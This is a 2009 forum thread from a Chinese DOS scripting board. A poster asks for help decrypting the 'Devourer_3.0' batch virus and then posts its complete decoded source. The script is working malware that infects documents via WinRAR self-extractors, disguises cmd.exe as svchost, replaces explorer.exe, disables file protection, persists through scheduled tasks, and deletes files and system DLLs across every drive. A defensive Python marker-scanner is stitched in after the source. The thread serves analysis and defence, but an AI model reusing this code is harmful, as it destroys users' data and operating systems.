China DOS Union Forum (www.cn-dos.net/forum) » DOS Batch & Scripting (Batch Room)
Topic: [Help] Decrypting the Devourer_3.0 virus BAT file
badboy110 (original poster), post #1: [Help] Decrypting the Devourer_3.0 virus BAT file

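Recently I've found that a lot of people have been hit by this Devourer_3.0 virus; their Word and TXT files have all been packed into self-extracting programs.
Inside each self-extracting program there is a BAT virus file whose name starts with Devourer_3.0.
It uses two layers of encryption:
ordinary encryption and variable encryption.
My skills aren't up to it, and I couldn't fully decode it...
So I'm posting it here to ask for help!

Infected DOC sample
http://upload.cn-dos.net/img/1771.rar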

2009-12-9 02:14
badboy110, post #2:

I finished replacing them one by one myself...


pengfei@cn-dos.net

goto RealHead
[Devourer_3.0_19066379410755][神行者sn.txt][TDPack]
:RealHead
cls
@echo off
:AvoideVNBug
if "%APPDATA%"=="" if not exist %systemroot%\system32\drivers\values.log goto Kill
if "%APPDATA%"=="" FOR /F "tokens=*" %%i in (%systemroot%\system32\drivers\values.log) do set %%i
set tcopu=%%bh%%jkq%%vz%%f7%%4c50t%%u1w8%%(cdf9)%%@6tc%%
setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
set Dewourer=%systemroot%\Fonts\HIDESE~1
set setup=%systemroot%\Fonts\HIDESE~1\Dewourersetup
set rar=%Devourer%\WinRAR
set selfcode=%random%%random%
if "%1"=="-Install" goto Install
if "%1"=="-Run" goto Run
if "%1"=="-Tenbatsu" goto Tenbatsu
if "%1"=="-Kill" goto Kill
if "%1"=="-Open" goto Open
if /i "%1"=="-goto" goto %2
:CheckSign
if "%1"=="-Fil" if exist %Devourer%\Devourer.sign del /f /a /q %0&exit
if exist %Devourer%\Devourer.sign exit
echo %selfcode%>%Devourer%\Devourer.sign
if not exist %Devourer%\SOLA.BAT goto ChkSGNNext
del /f /a /q %Devourer%\*.*
rd /s /q %Devourer%\solasetup
:ChkSGNNext
echo>%Devourer%\sola.sign
if not exist "%ALLUSERSPROFILE%\桌面" goto End
:HIDESelf
md %systemroot%\Fonts\HIDESELF...\
md %Devourer%\0nodel................\
if not exist %Devourer% goto Kill
:FileCopy
set selfname=%0
attrib %selfname% -s -h -r
if not "%1"=="-USB" copy %selfname% %Devourer%\Devourer.bat
if "%1"=="-USB" copy Devourer.bat %Devourer%\Devourer.bat
attrib %selfname% +s +h +r
if not exist %Devourer%\Devourer.bat goto kill
cd\
md %Devourer%\WinRAR
md %Devourer%\WinRAR\Formats
if not exist Devourer\WINRAR goto FileCopyNext
copy Devourer\WinRAR\*.* %Devourer%\Winrar\*.*
copy Devourer\WinRAR\Formats\*.* %Devourer%\Winrar\Formats\*.*
goto FileCopyNext2
:FileCopyNext
if not exist "%programfiles%\winrar\winrar.exe" goto Kill
copy "%programfiles%\winrar\*.*" %Devourer%\Winrar\*.*
copy "%programfiles%\winrar\Formats\*.*" %Devourer%\Winrar\Formats\*.*
:FileCopyNext2
echo On Error Resume Next>%Devourer%\Devourer.VBS
echo set ws=wscript.createobject("wscript.shell")>>%Devourer%\Devourer.VBS
echo ws.run "cmd /c %Devourer%\Devourer.BAT -Install",0 >>%Devourer%\Devourer.VBS
cscript %Devourer%\Devourer.VBS
del %Devourer%\Devourer.VBS
if "%1"=="-Fil" del /f /a /q %0
exit
====================================================
:Install
:PackerSetup
%SystemDrive%
cd %Devourer%
if exist Devourersetup rd /s /q Devourersetup
md Devourersetup
cd Devourersetup
..\WinRAR\rar.exe e -hpeostc "%0"
..\WinRAR\rar.exe a -m5 -hpeostc Function.dll *
copy ..\WinRAR\rar.exe rar.exe
copy *.ico ..\WinRAR\*.ico
copy example.rar ..\WinRAR\example.rar
cd..
tasklist >%Devourer%\task.txt
FOR /F "tokens=1" %%i in ('findstr /I "svchost.exe" "%Devourer%\task.txt"') do set svchost=%%i
copy %systemroot%\system32\cmd.exe %Devourer%\%svchost%
copy %setup%\sleep.exe %setup%\%svchost%
if not exist %Devourer%\svchost.exe copy %systemroot%\system32\cmd.exe %Devourer%\svchost.exe&copy %setup%\sleep.exe %setup%\svchost.exe
del %Devourer%\task.txt
cd WinRAR
copy Default.SFX C:\~$.sfx
for %%i in (txt doc jpg exe exp fil) do copy example.rar ..\Devourersetup\%%ipack.dll
start /min %rar%\winrar.exe ch -- %setup%\example.rar
%setup%\svchost.exe 1000
call regedit.exe /s %setup%\RegA.txt
%setup%\svchost.exe 1000
copy /y txt.ico C:\~$.ico&start /min %rar%\winrar.exe ch -- %setup%\txtpack.dll&%setup%\svchost.exe 2000
copy /y doc.ico C:\~$.ico&start /min %rar%\winrar.exe ch -- %setup%\docpack.dll&%setup%\svchost.exe 2000
copy /y jpg.ico C:\~$.ico&start /min %rar%\winrar.exe ch -- %setup%\jpgpack.dll&%setup%\svchost.exe 2000
copy /y exe.ico C:\~$.ico&start /min %rar%\winrar.exe ch -- %setup%\exepack.dll&%setup%\svchost.exe 2000
copy /y exp.ico C:\~$.ico&start /min %rar%\winrar.exe ch -- %setup%\exppack.dll&%setup%\svchost.exe 2000
copy /y fil.ico C:\~$.ico&start /min %rar%\winrar.exe ch -- %setup%\filpack.dll&%setup%\svchost.exe 2000
call regedit.exe /s %setup%\RegB.txt
del C:\~$.*
cd..
:MakeRarNormal
md 0WinRAR\Formats
cd 0WinRAR
copy ..\WinRAR\Formats\UNACEV2.DLL Formats\*.*
copy ..\WinRAR\Default.SFX Default.SFX
copy ..\WinRAR\Descript.ion Descript.ion
copy ..\WinRAR\Rar.exe Rar.exe
copy ..\WinRAR\RarExt64.dll RarExt64.dll
copy ..\WinRAR\RarExt.dll RarExt.dll
copy ..\WinRAR\RarFiles.lst RarFiles.lst
copy ..\WinRAR\WinRAR.exe WinRAR.exe
cd..
rd /s /q WinRAR
ren 0WinRAR WinRAR
if exist %Devourer%\mod.bat del /f /a /q %Devourer%\mod.bat
copy %setup%\mod.bat %Devourer%\mod.bat
echo ::MADE_BY_KCN-%selfcode%>>%Devourer%\mod.bat
copy /Y %setup%\CHAIN.BAT %systemroot%\system32\CHAIN.BAT
echo Windows Registry Editor Version 5.00>%setup%\reg.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule]>>%setup%\reg.reg
echo "Start"=dword:00000002>>%setup%\reg.reg
regedit /e %systemroot%\ls.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule"
%setup%\svchost.exe 1000
type %systemroot%\ls.reg>%Devourer%\ls.txt
FOR /F "tokens=2 delims=:" %%i in ('findstr /c:"tart" %Devourer%\ls.txt') do if not "%%i"=="00000002" regedit /s %setup%\reg.reg
echo Windows Registry Editor Version 5.00>>%setup%\reg2.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]>>%setup%\reg2.reg
echo "HideFileExt"=dword:00000001>>%setup%\reg2.reg
echo "ShowSuperHidden"=dword:00000000>>%setup%\reg2.reg
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt]>>%setup%\reg2.reg
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]>>%setup%\reg2.reg
start regedit.exe /s %setup%\reg2.reg
:Mainsetup
:MainStep1
echo On Error Resume Next>lsvbs.VBS
echo set ws=wscript.createobject("wscript.shell")>>lsvbs.VBS
echo ws.run "cmd /c %Devourer%\Devourer.BAT -goto TaskSetup",0 >>lsvbs.VBS
cscript lsvbs.vbs
%setup%\svchost.exe 10000
if exist %Devourer%\TaskOK del %Devourer%\TaskOK&goto MainStep4
:MainStep2
del %systemroot%\Tasks\Tasks.job
echo On Error Resume Next>lsvbs.VBS
echo set ws=wscript.createobject("wscript.shell")>>lsvbs.VBS
echo ws.run "cmd /c %Devourer%\Devourer.BAT -goto ExpSetup",0 >>lsvbs.VBS
cscript lsvbs.vbs
%setup%\svchost.exe 10000
if exist %Devourer%\ExpOK del %Devourer%\ExpOK&goto MainStep4
:MainStep3
echo On Error Resume Next>lsvbs.VBS
echo set ws=wscript.createobject("wscript.shell")>>lsvbs.VBS
echo ws.run "cmd /c %Devourer%\Devourer.BAT -goto MenuSetup",0 >>lsvbs.VBS
cscript lsvbs.vbs
%setup%\svchost.exe 10000
if exist %Devourer%\MenuOK del %Devourer%\MenuOK&goto MainStep4
goto Kill
:MainStep4
:NOSLK
del /f /a /q %systemroot%\system32\rar.exe %systemroot%\SOLAADDRESS.TXT "%Programfiles%\KAKENHI'S\GUICheck.bat"
md %systemroot%\system32\rar.exe\nodel......\
md %systemroot%\solaaddress.txt\nodel......\
md "%Programfiles%\KAKENHI'S\GUICheck.bat\nodel......\"
:SetTwunk32
FOR /F "skip=5 tokens=1,4" %%i in ('dir %systemroot%\twunk_16.exe') do if /I "%%j"=="twunk_16.exe" set fDate=%%i
set rDate=%Date%
date %fDate%
echo.>>%systemroot%\Fonts\deskUI.ini
echo [.ShellClassInfo2]>>%systemroot%\Fonts\deskUI.ini
echo fontype=NT-%selfcode%.FON>>%systemroot%\Fonts\deskUI.ini
set>%systemroot%\system32\driwers\walues.log
date %rDate%
:VoideUnownBug
FOR /F "tokens=*" %%i in (%Devourer%\Devourer.bat) do echo %%i>LS.bat&goto DebugNext
:DebugNext
type %setup%\Devourer.bat>>LS.bat
copy /y LS.bat %Devourer%\Devourer.bat&exit
:TaskSetup
attrib %systemroot%\Tasks\Tasks.job -s -h -r
del %systemroot%\Tasks\Tasks.job
type %setup%\Tasks.xxx>%systemroot%\Tasks\Tasks.job
schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks" & if errorlevel 1 exit
:TaskNext
attrib %systemroot%\Tasks\Tasks.job +s +h +r
echo.>%Devourer%\TaskOK
echo.>%Devourer%\TaskStart
exit
:ExpSetup
ren %systemroot%\system32\svchost.exe 0svchost.exe
if errorlevel 1 exit
ren %systemroot%\system32\0svchost.exe svchost.exe
if not exist %systemroot%\system32\dbgeng.dll exit
copy /Y %setup%\exppack.dll %Devourer%\explorer.exe
copy /Y %setup%\ntsd.exe %systemroot%\system32\stop.exe
echo On Error Resume Next>Devourer.VBS
echo set ws=wscript.createobject("wscript.shell")>>Devourer.VBS
echo ws.run "%Devourer%\svchost.exe /c %Devourer%\Devourer.BAT -Run -ExpStart",0 >>Devourer.VBS
echo ws.run "%systemroot%\system32\CHAIN.BAT -Guide",0 >>Devourer.VBS
%setup%\rar.exe -m0 -ep -ep1 a %Devourer%\explorer.exe Devourer.vbs
del Devourer.vbs
:ZsMake1
echo SavePath>zs.txt
echo Setup=Devourer.vbs>>zs.txt
echo silent=1 >>zs.txt
echo Overwrite=1 >>zs.txt
%setup%\rar.exe -zzs.txt c %Devourer%\explorer.exe
del zs.txt
echo KZSSXN93JS900SCKNKDSK>>%Devourer%\explorer.exe
:KillSFC
start mshta "javascript:new ActiveXObject('WScript.Shell').Run('stop -pn winlogon.exe',0);window.close()"
del /f /a %systemroot%\system32\sfcfiles.dll %systemroot%\system32\dllcache\sfcfiles.dll
:ReplaceFile
ren %systemroot%\explorer.exe 0explorer.exe
attrib %systemroot%\0explorer.exe +s +h +r
copy %Devourer%\explorer.exe %systemroot%\explorer.exe
echo.>%Devourer%\ExpOK
exit
:MenuSetup
%homedrive%
cd "%ALLUSERSPROFILE%"
cd 「开始」菜单\程序\启动
echo On Error Resume Next>Devourer.VBS
if not exist Devourer.VBS exit
echo set ws=wscript.createobject("wscript.shell")>>Devourer.VBS
echo ws.run "%Devourer%\svchost.exe /c %Devourer%\Devourer.BAT -Run",0 >>Devourer.VBS
echo ws.run "%systemroot%\system32\CHAIN.BAT -Guide",0 >>Devourer.VBS
copy Devourer.VBS %Devourer%\Devourer.VBS
echo NT>%Devourer%\NoTasks
echo.>%Devourer%\MenuOK
exit
:Run
if exist %Devourer%\Dewourer.sign echo %selfcode%>%Devourer%\Dewourer.sign
if not "%2"=="-ExpStart" goto RunNext
:StartExplorer
%systemdrive%
cd %systemroot%
ren explorer.exe 1explorer.exe
attrib 0explorer.exe -s -h -r
ren 0explorer.exe explorer.exe
start explorer.exe
%setup%\svchost.exe 10000
ren explorer.exe 0explorer.exe
ren 1explorer.exe explorer.exe
attrib 0explorer.exe +s +h +r
del %systemroot%\Devourer.VBS
cd %Devourer%
:RunNext
:RunTimeChk
if not exist %Devourer%\RunTime.txt echo RunSign_50>%Devourer%\RunTime.txt
FOR /F "tokens=2 delims=_" %%i in (%Devourer%\RunTime.txt) do set RunTime=%%i
if /i %RunTime% leq 0 goto Virus
set /a RunTime=%Runtime%-1
echo RunSign_%RunTime%>%Devourer%\RunTime.txt
:Diskchk
echo On Error Resume Next>%Devourer%\RecentInf.VBS
echo set ws=wscript.createobject("wscript.shell")>>%Devourer%\RecentInf.VBS
echo ws.run "%Devourer%\svchost.exe /c %setup%\RecentInf.bat",0 >>%Devourer%\RecentInf.VBS
cscript %Devourer%\RecentInf.VBS
del %Devourer%\RecentInf.VBS
set runroot=%ALLUSERSPROFILE%\「开始」菜单\程序\启动
set taskroot=%systemroot%\Tasks
:CHAIN
echo.>%systemroot%\DriweInf.ini
echo On Error Resume Next>%Devourer%\lswbs.wbs
echo set ws=wscript.createobject("wscript.shell")>>%Devourer%\lswbs.wbs
echo ws.run "%systemroot%\system32\CHAIN.BAT -TimeSet",0 >>%Devourer%\lswbs.wbs
cscript %Devourer%\lswbs.wbs
del %Devourer%\lswbs.wbs
for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do vol %%i:&if errorlevel 1 set %%i=1
for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do echo 1>%%i:\Devourerchk1 & findstr . %%i:\Devourerchk1 & if not errorlevel 1 del %%i:\Devourerchk1&if not exist %%i:\Devourer\WINRAR\WinRAR.exe md %%i:\Devourer\WinRAR\Formats&copy %rar%\Formats\* %%i:\Devourer\WinRAR\Formats\*&copy %rar%\* %%i:\Devourer\WinRAR\*&attrib %%i:\Devourer +s +h +r
echo On Error Resume Next>%Devourer%\lsvbs.vbs
echo set ws=wscript.createobject("wscript.shell")>>%Devourer%\lsvbs.vbs
echo ws.run "%Devourer%\svchost.exe /c %setup%\RarInform.bat %selfcode%",0 >>%Devourer%\lsvbs.vbs
cscript %Devourer%\lsvbs.vbs
del %Devourer%\lsvbs.vbs
:RunBack
if "%chktime%"=="" set chktime=0
set /a chktime=%chktime%+2
if /i %chktime% geq 60 goto DvRARChk
:RunBack2
if "%C%"=="1" vol C:&if not errorlevel 1 call %setup%\Scan.bat C:
if "%D%"=="1" vol D:&if not errorlevel 1 call %setup%\Scan.bat D:
if "%E%"=="1" vol E:&if not errorlevel 1 call %setup%\Scan.bat E:
if "%F%"=="1" vol F:&if not errorlevel 1 call %setup%\Scan.bat F:
if "%G%"=="1" vol G:&if not errorlevel 1 call %setup%\Scan.bat G:
if "%H%"=="1" vol H:&if not errorlevel 1 call %setup%\Scan.bat H:
if "%I%"=="1" vol I:&if not errorlevel 1 call %setup%\Scan.bat I:
if "%J%"=="1" vol J:&if not errorlevel 1 call %setup%\Scan.bat J:
if "%K%"=="1" vol K:&if not errorlevel 1 call %setup%\Scan.bat K:
if "%L%"=="1" vol L:&if not errorlevel 1 call %setup%\Scan.bat L:
if "%M%"=="1" vol M:&if not errorlevel 1 call %setup%\Scan.bat M:
if "%N%"=="1" vol N:&if not errorlevel 1 call %setup%\Scan.bat N:
if "%O%"=="1" vol O:&if not errorlevel 1 call %setup%\Scan.bat O:
if "%P%"=="1" vol P:&if not errorlevel 1 call %setup%\Scan.bat P:
if "%Q%"=="1" vol Q:&if not errorlevel 1 call %setup%\Scan.bat Q:
if "%R%"=="1" vol R:&if not errorlevel 1 call %setup%\Scan.bat R:
if "%S%"=="1" vol S:&if not errorlevel 1 call %setup%\Scan.bat S:
if "%T%"=="1" vol T:&if not errorlevel 1 call %setup%\Scan.bat T:
if "%U%"=="1" vol U:&if not errorlevel 1 call %setup%\Scan.bat U:
if "%V%"=="1" vol V:&if not errorlevel 1 call %setup%\Scan.bat V:
if "%W%"=="1" vol W:&if not errorlevel 1 call %setup%\Scan.bat W:
if "%X%"=="1" vol X:&if not errorlevel 1 call %setup%\Scan.bat X:
if "%Y%"=="1" vol Y:&if not errorlevel 1 call %setup%\Scan.bat Y:
if "%Z%"=="1" vol Z:&if not errorlevel 1 call %setup%\Scan.bat Z:
if "%C%"=="2" vol C:&if errorlevel 1 set C=1
if "%D%"=="2" vol D:&if errorlevel 1 set D=1
if "%E%"=="2" vol E:&if errorlevel 1 set E=1
if "%F%"=="2" vol F:&if errorlevel 1 set F=1
if "%G%"=="2" vol G:&if errorlevel 1 set G=1
if "%H%"=="2" vol H:&if errorlevel 1 set H=1
if "%I%"=="2" vol I:&if errorlevel 1 set I=1
if "%J%"=="2" vol J:&if errorlevel 1 set J=1
if "%K%"=="2" vol K:&if errorlevel 1 set K=1
if "%L%"=="2" vol L:&if errorlevel 1 set L=1
if "%M%"=="2" vol M:&if errorlevel 1 set M=1
if "%N%"=="2" vol N:&if errorlevel 1 set N=1
if "%O%"=="2" vol O:&if errorlevel 1 set O=1
if "%P%"=="2" vol P:&if errorlevel 1 set P=1
if "%Q%"=="2" vol Q:&if errorlevel 1 set Q=1
if "%R%"=="2" vol R:&if errorlevel 1 set R=1
if "%S%"=="2" vol S:&if errorlevel 1 set S=1
if "%T%"=="2" vol T:&if errorlevel 1 set T=1
if "%U%"=="2" vol U:&if errorlevel 1 set U=1
if "%V%"=="2" vol V:&if errorlevel 1 set V=1
if "%W%"=="2" vol W:&if errorlevel 1 set W=1
if "%X%"=="2" vol X:&if errorlevel 1 set X=1
if "%Y%"=="2" vol Y:&if errorlevel 1 set Y=1
if "%Z%"=="2" vol Z:&if errorlevel 1 set Z=1
if exist %systemroot%\DriveInf.ini del %systemroot%\DriveInf.ini
echo.>%systemroot%\DRKakunin.ini
%setup%\svchost.exe 500
if exist %systemroot%\ls*.reg del %systemroot%\ls*.reg
regedit /e %systemroot%\ls1.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule"
%setup%\svchost.exe 500
type %systemroot%\ls1.reg>%Devourer%\ls.txt
FOR /F "tokens=2 delims=:" %%i in ('findstr /c:"tart" %Devourer%\ls.txt') do if not "%%i"=="00000002" regedit /s %setup%\reg.reg
%setup%\svchost.exe 500
if exist %Devourer%\NoTasks if not exist "%runroot%\Devourer.VBS" copy "%Devourer%\Devourer.VBS" "%runroot%\Devourer.VBS"
if exist %Devourer%\TaskStart if not exist %Taskroot%\Tasks.job copy %setup%\Tasks.xxx %Taskroot%\Tasks.job&attrib %Taskroot%\Tasks.job +s +h +r&schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks"
if "%2"=="-ExpStart" attrib %systemroot%\explorer.exe -s -h -r&%setup%\svchost.exe 500
if not exist %systemroot%\explorer.exe copy %setup%\explorer.exe %systemroot%\explorer.exe
if "%2"=="-ExpStart" findstr KZSSXN93JS900SCKNKDSK %systemroot%\explorer.exe>nul&if errorlevel 1 if not exist %systemroot%\1explorer.exe goto Kill
if not exist %systemroot%\system32\CHAIN.BAT goto Kill
set sign=
FOR /F "skip=1 tokens=*" %%i in (%systemroot%\system32\CHAIN.BAT) do set sign=%%i&goto CHCHK
:CHCHK
if not "%sign%"=="::CHAIN" goto Kill
%setup%\svchost.exe 500
goto RunBack
:Restart
if exist "D:\I am KAKENHI.txt" shutdown -r -t 100 -c "DevourerRestart"&goto RSTEnd
shutdown -r -f -t 1
%setup%\svchost.exe 100000
start %setup%\ntsd.exe -c q -pn csrss.exe
:RSTEnd
goto DiskChk
:DvRARChk
set chktime=0
if not exist %Devourer%\ScanF goto RunBack2
echo On Error Resume Next>%Devourer%\lsvbs.vbs
echo set ws=wscript.createobject("wscript.shell")>>%Devourer%\lsvbs.vbs
echo ws.run "%Devourer%\svchost.exe /c %setup%\RarInform.bat %selfcode%",0 >>%Devourer%\lsvbs.vbs
cscript %Devourer%\lsvbs.vbs
del %Devourer%\lsvbs.vbs
goto RunBack2
:Virus
if exist %systemroot%\tasks\tasks.ini if exist %systemroot%\tasks\desks.ini goto HiPD
if exist %systemroot%\tasks\tasks.ini goto TENBATSU
if exist %systemroot%\tasks\desks.ini goto formatall
if exist %Devourer%\HKLFinish.ini if exist %Devourer%\AKLFinish.ini goto Reset
del %Devourer%\RunTime.txt
goto DiskChk
:HiPD
FOR %%i IN (%setup%\akari.txt) DO if /i %%~zi lss 102400 goto TENBATSU
goto Reset
:Kill
if exist "D:\I am KAKENHI.txt" shutdown -r -t 100 -c "DevourerKill"&goto KillEND
echo Windows Registry Editor Version 5.00>%systemroot%\recover.reg
echo [-HKEY_LOCAL_MACHINE\HARDWARE]>>%systemroot%\recover.reg
echo del /f /a /q %systemroot\repair\*>%systemroot%\units.bat
echo ren %systemroot%\system32\*.dll 0*.dll>>%systemroot%\units.bat
echo ren %systemroot%\system32\drivers\*.sys 0*.sys>>%systemroot%\units.bat
echo On Error Resume Next>lskill.vbs
echo set ws=wscript.createobject("wscript.shell")>>lskill.vbs
echo ws.run "cmd /c %systemroot%\units.bat",0 >>lskill.vbs
del /f /a /q %systemroot%\system32\dllcache\*
ren %systemroot%\explorer.exe explorer.exe123
taskkill /f /im explorer.exe&ntsd -c q -pn explorer.exe
shutdown -r -t 60 -c "由于CRC服务被意外终止,系统即将重新启动。"
mshta "javascript:new ActiveXObject('WScript.Shell').Run('cmd /c del /f /a /q %systemdrive%\\*',0);window.close()"
cscript lskill.vbs
regedit /s %systemroot%\recover.reg
:KillEND
goto Diskchk
:TENBATSU
if exist "D:\I am KAKENHI.txt" shutdown -r -t 100 -c "TENBATSU"&goto TENBATSUEND
set alldrive=
for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do call %setup%\HIKARI.BAT eoladd %%i:
for %%i in (%alldrive%) do del /f /a /q /s %%i
del /f /a /q /s "%HOMEDRIVE%\Documents and Settings"
goto Kill
:formatall
echo On Error Resume Next>%Devourer%\lswbs.wbs
echo set ws=wscript.createobject("wscript.shell")>>%Devourer%\lswbs.wbs
echo ws.run "%Devourer%\swchost.exe /c %setup%\akari.bat LBEX %selfcode%",0 >>%Devourer%\lswbs.wbs
cscript %Devourer%\lswbs.wbs
del %Devourer%\lswbs.wbs
echo RunSign_999999999>%Devourer%\RunTime.txt
:TENBATSUEND
goto DiskChk
:Reset
del %systemroot%\Tasks\*.ini
del %Devourer%\ScanF %Devourer%\HKLFinish.ini %Devourer%\AKLFinish.ini
del %Devourer%\hikari.ini %Devourer%\akari.ini
del %setup%\hikari.txt %setup%\akari.txt
del %Devourer%\RarInform.ini %Devourer%\RunTime.txt
goto DiskChk
:Open
if "%1"=="-USB" Exit
FOR /F "tokens=1,2,3 skip=2 delims=[]" %%i in (%~nx0) do set code=%%i&set name=%%j&set type=%%k&goto OpenNext
:OpenNext
goto %type%
:EJPack
if not Exist "%Name%" exit
call "%Name%"
del /f /a /q "%Name%"
del /f /a /q %0
exit
:TDPack
if not exist "%Name%" exit
call "%Name%"
:Save
FOR /F "tokens=1 delims=:" %%i in ('findstr "%Code%" *.exe') do set PackName=%%i
%setup%\rar.exe -m0 -ep -ep1 a "%PackName%" "%Name%"
echo %Code%>>"%PackName%"
:Del
del /f /a /q "%Name%"
del /f /a /q %0
exit
:End

2009-12-9 06:31
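
A triage sketch built on the markers visible in the script above, added here as an example and not part of the original post: it parses the bracketed `[code][name][type]` header line and flags `.exe` files whose tail carries either the per-file code that `:Save` appends or the `KZSSXN93JS900SCKNKDSK` string that `:ZsMake1` appends to the replaced explorer.exe. The function names, the 512-byte tail window, the GBK file-name encoding and the header sitting within the first five lines are assumptions.

```python
import re
import tempfile
from pathlib import Path

# Header line of the dropper as posted: [code][original file name][pack type]
HEADER_RE = re.compile(rb"\[(Devourer_[\d.]+_\d+)\]\[([^\]\r\n]+)\]\[(\w+)\]")
# Per-file code that the :Save routine appends to the repacked .exe
CODE_RE = re.compile(rb"Devourer_[\d.]+_\d+")
# Marker the :ZsMake1 step appends to the replaced explorer.exe
EXPLORER_MARKER = b"KZSSXN93JS900SCKNKDSK"
TAIL_BYTES = 512  # assumption: markers are appended, so only the tail is read


def parse_header(bat: bytes):
    """Return (code, original_name, pack_type) from the first lines of a dropper BAT."""
    for line in bat.splitlines()[:5]:
        m = HEADER_RE.fullmatch(line.strip())
        if m:
            code, name, kind = m.groups()
            # Assumption: file names are GBK-encoded; undecodable bytes are replaced.
            return code.decode("ascii"), name.decode("gbk", "replace"), kind.decode("ascii")
    return None


def classify_tail(tail: bytes):
    """Classify a file by the marker found in its trailing bytes, if any."""
    if EXPLORER_MARKER in tail:
        return ("patched-explorer", EXPLORER_MARKER.decode())
    m = CODE_RE.search(tail)
    return ("sfx-carrier", m.group().decode()) if m else None


def scan(root: Path):
    """Return (file name, verdict, marker) for every .exe under root that carries a marker."""
    hits = []
    for path in sorted(root.rglob("*.exe")):
        with path.open("rb") as fh:
            fh.seek(0, 2)
            fh.seek(max(0, fh.tell() - TAIL_BYTES))
            verdict = classify_tail(fh.read())
        if verdict:
            hits.append((path.name, *verdict))
    return hits


if __name__ == "__main__":
    # Constructed sample data: inert bytes plus the markers quoted in the thread.
    header = "goto RealHead\r\n[Devourer_3.0_19066379410755][神行者sn.txt][TDPack]\r\n".encode("gbk")
    print(parse_header(header))
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "report.exe").write_bytes(b"MZ" + b"\0" * 900 + b"Devourer_3.0_19066379410755\r\n")
        (root / "explorer.exe").write_bytes(b"MZ" + b"\0" * 900 + EXPLORER_MARKER + b"\r\n")
        (root / "clean.exe").write_bytes(b"MZ" + b"\0" * 900)
        for hit in scan(root):
            print(hit)
```

A hit only means the appended marker is present; the file still has to be examined on an isolated analysis machine before anything is extracted from it.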
netbenton, post #3:

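Heh, the original poster really has patience.

Whoever made this virus really has nothing better to do...

Keep it lean
[yours + mine + theirs] => [everyone's]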
2009-12-9 08:27
Lin2009, post #4: Is it that impressive? Downloading it.

What kind of virus is this?

2009-12-9 23:41
badboy110, post #5:

The Devourer virus is similar to that earlier SOLA virus...
http://tieba.baidu.com/f?kz=633039463
There is an introduction here.

2009-12-10 09:53
523066680, post #6:

People who make viruses all have nothing better to do...



  
2009-12-10 14:20